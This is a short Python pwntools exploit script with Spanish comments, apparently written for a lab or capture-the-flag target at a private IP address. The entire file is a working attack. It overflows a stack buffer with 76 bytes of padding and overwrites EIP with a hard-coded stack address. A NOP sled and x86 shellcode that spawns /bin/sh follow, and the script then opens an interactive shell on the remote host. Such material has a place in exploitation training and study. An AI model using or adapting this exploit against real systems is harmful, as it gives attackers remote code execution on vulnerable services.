from pwn import *

p = remote('192.168.32.143', 1234)
eip = p32(0xbffff7c0)
exploit = "" #Sobreescribimos EIP a partir de \x90*76
exploit += "A"*(76)
exploit += eip #sobreescribimos eip para controlarlo y saltar donde nosotros queramos en este caso la direccion de memoria de $esp que es la siguiente direccion de memoria del eip
exploit += "\x90"*100 #nops que se ejecutaran despues del ret
exploit += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
p.sendline(exploit)

p.interactive()

